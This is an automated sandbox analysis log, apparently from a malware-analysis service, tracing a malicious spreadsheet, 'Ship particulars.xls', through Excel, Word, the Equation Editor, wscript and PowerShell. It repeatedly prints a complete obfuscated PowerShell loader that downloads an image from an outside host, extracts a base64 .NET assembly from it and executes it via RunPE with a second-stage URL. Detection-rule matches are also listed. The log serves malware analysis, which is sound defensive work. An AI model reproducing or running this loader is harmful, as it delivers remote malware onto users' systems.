Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write			Jump to behavior

Source: Ship particulars.xls

OLE indicator, VBA macros: true

Source: Ship particulars.xls

Stream path 'MBD0026D145/\x1Ole' : http://hop.fyi/sWel7Oa~_q%Yw!G7j&F|ZJI}BrKgJ"&s+j1pL-ER|Lj#EFb<kHhdsd$;{aI@;/*cPe%"vstTh6cJbYmbO7DHAlcpX7qKKqrqxYaqxLewLAFBEdsLm8PNMPlG7cCAUmRGOO2ylgsQYSFVqScSTyFbrUgiNBHK7hzTJOzwb3PW3KYHww1hYRyxjl1NEAs1DopTZpESd6ODn7qx4UZPd1ej-T1.V=6P"&~^,

Source: ~DF669CF6B4D81DE92B.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFA3F86C325C272D08.TMP.0.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp.3.dr	OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Process Memory Space: powershell.exe PID: 3440, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/34@13/4

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\92530000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7261.tmp

Jump to behavior

Source: Ship particulars.xls	OLE indicator, Workbook stream: true
Source: 92530000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Ship particulars.xls

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatingfollowerswithflowerese.vBS"			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: ~DF669CF6B4D81DE92B.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Ship particulars.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( $pshoMe[4]+$psHome[34]+'X')"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('SeVlink = 8ZKhttps://uploaddeimagens.com.br/i'+'mages/004/807/053/original/new_i'+'mage.jpg?171984'+'62358ZK; SeVwebClient = New-Object System.Net.WebClient; try { SeVdownloadedData = SeVwebClient.DownloadData(SeVlink) } catch { Write-Host 8ZKFailed To download data from SeV'+'link'+'8ZK -ForegroundColor Red; exit }; i'+'f'+' (SeVdownloadedData -ne SeVnull) { SeVimageText = [System.Text.Encoding'+']::UTF8.GetString(SeVdownloadedData); SeVstartFlag = 8ZK<<BASE64_START>>8ZK; SeVendFlag = 8ZK<<BASE64_END>>8ZK; SeVstartIndex = SeVimageText.IndexOf(SeVstartFlag); SeVendIndex = SeVimageText.IndexOf(SeVendFlag); if (SeVstartIndex -ge 0 -and SeVendI'+'ndex -gt SeVsta'+'rtIndex) { SeVs'+'tar'+'tIndex += SeVstartFlag.Length; SeV'+'ba'+'se64L'+'ength = SeVendInde'+'x - SeVstartIndex; SeVba'+'se64Command = SeVimageText.Substring(SeVstartIndex, SeVbase64Length); SeVcommandBytes = [System.Convert]::FromBase64String(SeVbase64Command); SeVloadedAssembly = [System.Reflection.A'+'ssembly]::Load(SeVcommandBytes); SeVtyp'+'e = SeVloadedAssembly.GetTyp'+'e(8ZKRunPE.Home8ZK); SeVmethod = SeVtype.Ge'+'tMethod(8ZKVAI8ZK).Invoke(SeVnull, [object[]] '+'(8ZKtxt.SERO/44133/931.871.64.891//:ptth8ZK , 8ZKd'+'esativado8ZK , 8ZKdesativado8ZK , 8ZK'+'desativado8ZK,8ZKRegAsm8ZK,8ZK8ZK)) } }').rEplaCE('8ZK',[STriNg][ChAr]39).rEplaCE(([ChAr]83+[ChAr]101+[ChAr]86),[STriNg][ChAr]36)| &( 